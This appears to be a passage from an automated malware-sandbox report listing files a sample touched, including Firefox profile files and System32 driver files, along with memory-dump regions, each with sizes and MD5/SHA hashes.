                                                        81bcbcbb5ce1368d23f1fd8a2bf30a345053dc0fc667e8f0481d0f47b43e187b6fff3efb79c847c59acc131d045f76b05aa2a29f819a98c7db8ec7382074b2d3

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\sessionstore-backups\recovery.jsonlz4
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        c54fac5a628babf561167b93453f34f7

                                                        SHA1

                                                        9e90a7967b448cee621bc3e0121ef8a04ad355f5

                                                        SHA256

                                                        55d3b572f7abaa35659551a1186d16ad574bc9403275a45147215879ca45e5e5

                                                        SHA512

                                                        43e6ecccc0b3477eaa2498b3c89dd29f7e6bb6ee0c748bbf68957242cb46d2f5d2255fe4e7b40d103ee3f0b26afebedc74ad9dc31187ba113b53fdce35a00223

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                                        Filesize

                                                        10.3MB

                                                        MD5

                                                        328a96386f5fc9caa2b1d435ae904023

                                                        SHA1

                                                        2667413c1f93cd22261438383c7247d0fee84869

                                                        SHA256

                                                        704408df1ff5d5c49df3399e0665f8e136caba4417efe81f4be83ef311d83f2d

                                                        SHA512

                                                        fe1ce61329e31cc9f807ea38526d70d3aeee0bb458237bffce8d92954e67ac676902ae723787dc4345455e95b881bb33f44d7a51ef649e229769a5754604652b

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                                        Filesize

                                                        10.3MB

                                                        MD5

                                                        30a13e82238cade3a340260539652317

                                                        SHA1

                                                        d94ba32acc8bebf722ac42c55d9e053fb8931fb8

                                                        SHA256

                                                        1aae694c089b72cf4025a03ea1f2879a90d9a7d81eb9436ab979461e4d976715

                                                        SHA512

                                                        033e03801b63f459302d4f404dc6c84c86ba42f2f7425d7a7ce2c59ad0b2e5b0a0aec548b1261381f41a9ec5efb8afcbdb7e08778d20f8c2bd814cd4369e9c22

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
                                                        Filesize

                                                        80KB

                                                        MD5

                                                        e576238d290a7b865d71541ec37d4973

                                                        SHA1

                                                        0d8d3b0edc8bb602fd30ccdaa82ae8b377306770

                                                        SHA256

                                                        993cba2647499d6db857f3357db3ac9f3a6952e31009f5f6b73f825063b18af3

                                                        SHA512

                                                        a73b0d6a9a514c8ebb36d65ed22722c61a8dcb493e1d44d6a81f9e98a60f7c894760037261985a11f3986107b4cfd7cd8bd9dce72bca1fd91eb3e410f68aef83

                                                        Download Submit

                                                      • C:\Windows\System32\drivers\9c4d2b28.sys
                                                        Filesize

                                                        368KB

                                                        MD5

                                                        990442d764ff1262c0b7be1e3088b6d3

                                                        SHA1

                                                        0b161374074ef2acc101ed23204da00a0acaa86e

                                                        SHA256

                                                        6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

                                                        SHA512

                                                        af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

                                                        Download Submit

                                                      • C:\Windows\System32\drivers\klupd_9c4d2b28a_klark.sys
                                                        Filesize

                                                        355KB

                                                        MD5

                                                        9cfe1ced0752035a26677843c0cbb4e3

                                                        SHA1

                                                        e8833ac499b41beb6763a684ba60333cdf955918

                                                        SHA256

                                                        3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

                                                        SHA512

                                                        29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

                                                        Download Submit

                                                      • C:\Windows\System32\drivers\klupd_9c4d2b28a_klbg.sys
                                                        Filesize

                                                        199KB

                                                        MD5

                                                        424b93cb92e15e3f41e3dd01a6a8e9cc

                                                        SHA1

                                                        2897ab04f69a92218bfac78f085456f98a18bdd3

                                                        SHA256

                                                        ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                        SHA512

                                                        15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                        Download Submit

                                                      • C:\Windows\System32\drivers\klupd_9c4d2b28a_mark.sys
                                                        Filesize

                                                        260KB

                                                        MD5

                                                        66522d67917b7994ddfb5647f1c3472e

                                                        SHA1

                                                        f341b9b28ca7ac21740d4a7d20e4477dba451139

                                                        SHA256

                                                        5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

                                                        SHA512

                                                        921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

                                                        Download Submit

                                                      • memory/1096-197-0x00000239A9BE0000-0x00000239A9BF8000-memory.dmp

                                                        Filesize

                                                        96KB

                                                        Download

                                                      • memory/1236-249-0x0000000000400000-0x0000000000463000-memory.dmp

                                                        Filesize

                                                        396KB

                                                        Download

                                                      • memory/1236-250-0x0000000000400000-0x0000000000463000-memory.dmp

                                                        Filesize

                                                        396KB

                                                        Download

                                                      • memory/1240-104-0x0000000005A30000-0x0000000005D84000-memory.dmp

                                                        Filesize

                                                        3.3MB

                                                        Download

                                                      • memory/1428-21-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-251-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-45-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-22-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-179-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-1293-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-313-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-763-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-234-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-20-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-19-0x0000000000C61000-0x0000000000C8F000-memory.dmp

                                                        Filesize

                                                        184KB

                                                        Download

                                                      • memory/1428-283-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1428-17-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1436-1171-0x00000221A11A0000-0x00000221A1211000-memory.dmp

                                                        Filesize

                                                        452KB

                                                        Download

                                                      • memory/1436-1161-0x0000000000600000-0x0000000000602000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/1436-1170-0x00000221A11A0000-0x00000221A1211000-memory.dmp

                                                        Filesize

                                                        452KB

                                                        Download

                                                      • memory/1436-1162-0x00000221A11A0000-0x00000221A1211000-memory.dmp

                                                        Filesize

                                                        452KB

                                                        Download

                                                      • memory/1436-1172-0x00000221A11A0000-0x00000221A1211000-memory.dmp

                                                        Filesize

                                                        452KB

                                                        Download

                                                      • memory/1568-177-0x0000000005DA0000-0x00000000060F4000-memory.dmp

                                                        Filesize

                                                        3.3MB

                                                        Download

                                                      • memory/1568-178-0x00000000062B0000-0x00000000062FC000-memory.dmp

                                                        Filesize

                                                        304KB

                                                        Download

                                                      • memory/1600-1157-0x0000000000400000-0x000000000069A000-memory.dmp

                                                        Filesize

                                                        2.6MB

                                                        Download

                                                      • memory/1720-1-0x0000000077284000-0x0000000077286000-memory.dmp

                                                        Filesize

                                                        8KB

                                                        Download

                                                      • memory/1720-4-0x00000000003E0000-0x00000000008BE000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1720-16-0x00000000003E0000-0x00000000008BE000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1720-0-0x00000000003E0000-0x00000000008BE000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/1720-2-0x00000000003E1000-0x000000000040F000-memory.dmp

                                                        Filesize

                                                        184KB

                                                        Download

                                                      • memory/1720-3-0x00000000003E0000-0x00000000008BE000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/2216-265-0x0000000000DD0000-0x00000000010F5000-memory.dmp

                                                        Filesize

                                                        3.1MB

                                                        Download

                                                      • memory/2216-267-0x0000000000DD0000-0x00000000010F5000-memory.dmp

                                                        Filesize

                                                        3.1MB

                                                        Download

                                                      • memory/2944-100-0x0000000000920000-0x0000000000DDE000-memory.dmp

                                                        Filesize

                                                        4.7MB

                                                        Download

                                                      • memory/2944-84-0x0000000000920000-0x0000000000DDE000-memory.dmp

                                                        Filesize

                                                        4.7MB

                                                        Download

                                                      • memory/3188-101-0x00000000064B0000-0x00000000064FC000-memory.dmp

                                                        Filesize

                                                        304KB

                                                        Download

                                                      • memory/3188-97-0x0000000005ED0000-0x0000000006224000-memory.dmp

                                                        Filesize

                                                        3.3MB

                                                        Download

                                                      • memory/3192-214-0x0000000000AB0000-0x0000000000F6E000-memory.dmp

                                                        Filesize

                                                        4.7MB

                                                        Download

                                                      • memory/3192-282-0x0000000000150000-0x00000000007DB000-memory.dmp

                                                        Filesize

                                                        6.5MB

                                                        Download

                                                      • memory/3192-196-0x0000000000AB0000-0x0000000000F6E000-memory.dmp

                                                        Filesize

                                                        4.7MB

                                                        Download

                                                      • memory/3192-284-0x0000000000150000-0x00000000007DB000-memory.dmp

                                                        Filesize

                                                        6.5MB

                                                        Download

                                                      • memory/3556-231-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/3556-233-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/3560-218-0x0000000000400000-0x0000000000464000-memory.dmp

                                                        Filesize

                                                        400KB

                                                        Download

                                                      • memory/3560-219-0x0000000000400000-0x0000000000464000-memory.dmp

                                                        Filesize

                                                        400KB

                                                        Download

                                                      • memory/3780-61-0x0000000007730000-0x0000000007DAA000-memory.dmp

                                                        Filesize

                                                        6.5MB

                                                        Download

                                                      • memory/3780-48-0x0000000005800000-0x0000000005866000-memory.dmp

                                                        Filesize

                                                        408KB

                                                        Download

                                                      • memory/3780-46-0x0000000004E20000-0x0000000004E42000-memory.dmp

                                                        Filesize

                                                        136KB

                                                        Download

                                                      • memory/3780-62-0x0000000006320000-0x000000000633A000-memory.dmp

                                                        Filesize

                                                        104KB

                                                        Download

                                                      • memory/3780-76-0x0000000008360000-0x0000000008904000-memory.dmp

                                                        Filesize

                                                        5.6MB

                                                        Download

                                                      • memory/3780-43-0x0000000004EC0000-0x00000000054E8000-memory.dmp

                                                        Filesize

                                                        6.2MB

                                                        Download

                                                      • memory/3780-42-0x0000000004820000-0x0000000004856000-memory.dmp

                                                        Filesize

                                                        216KB

                                                        Download

                                                      • memory/3780-60-0x0000000005EA0000-0x0000000005EEC000-memory.dmp

                                                        Filesize

                                                        304KB

                                                        Download

                                                      • memory/3780-58-0x0000000005870000-0x0000000005BC4000-memory.dmp

                                                        Filesize

                                                        3.3MB

                                                        Download

                                                      • memory/3780-75-0x0000000007230000-0x0000000007252000-memory.dmp

                                                        Filesize

                                                        136KB

                                                        Download

                                                      • memory/3780-59-0x0000000005DF0000-0x0000000005E0E000-memory.dmp

                                                        Filesize

                                                        120KB

                                                        Download

                                                      • memory/3780-47-0x0000000005720000-0x0000000005786000-memory.dmp

                                                        Filesize

                                                        408KB

                                                        Download

                                                      • memory/3780-74-0x0000000007290000-0x0000000007326000-memory.dmp

                                                        Filesize

                                                        600KB

                                                        Download

                                                      • memory/4080-147-0x0000027EF6250000-0x0000027EF6272000-memory.dmp

                                                        Filesize

                                                        136KB

                                                        Download

                                                      • memory/5188-1404-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1401-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1398-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1397-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1396-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1395-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1394-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1393-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1392-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1389-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1383-0x0000000140000000-0x000000014043F000-memory.dmp

                                                        Filesize

                                                        4.2MB

                                                        Download

                                                      • memory/5188-1403-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1405-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1400-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1406-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/5188-1402-0x0000000000860000-0x00000000009E8000-memory.dmp

                                                        Filesize

                                                        1.5MB

                                                        Download

                                                      • memory/6020-630-0x0000000000330000-0x0000000000792000-memory.dmp

                                                        Filesize

                                                        4.4MB

                                                        Download

                                                      • memory/6020-862-0x0000000000330000-0x0000000000792000-memory.dmp

                                                        Filesize

                                                        4.4MB

                                                        Download

                                                      • memory/6020-661-0x0000000000330000-0x0000000000792000-memory.dmp

                                                        Filesize

                                                        4.4MB

                                                        Download

                                                      • memory/6020-662-0x0000000000330000-0x0000000000792000-memory.dmp

                                                        Filesize

                                                        4.4MB

                                                        Download

                                                      • memory/6020-813-0x0000000000330000-0x0000000000792000-memory.dmp

                                                        Filesize

                                                        4.4MB

                                                        Download

                                                      • memory/6364-41893-0x0000000000400000-0x0000000000E1B000-memory.dmp

                                                        Filesize

                                                        10.1MB

                                                        Download

                                                      • memory/6364-41579-0x0000000000400000-0x0000000000E1B000-memory.dmp

                                                        Filesize

                                                        10.1MB

                                                        Download

                                                      • memory/12048-49405-0x0000000000400000-0x0000000000CC1000-memory.dmp

                                                        Filesize

                                                        8.8MB

                                                        Download

                                                      • memory/12048-48199-0x0000000000400000-0x0000000000CC1000-memory.dmp

                                                        Filesize

                                                        8.8MB

                                                        Download

                                                      • memory/12048-43069-0x0000000000400000-0x0000000000CC1000-memory.dmp

                                                        Filesize

                                                        8.8MB

                                                        Download

                                                      • memory/13144-41578-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download

                                                      • memory/13144-41492-0x0000000000C60000-0x000000000113E000-memory.dmp

                                                        Filesize

                                                        4.9MB

                                                        Download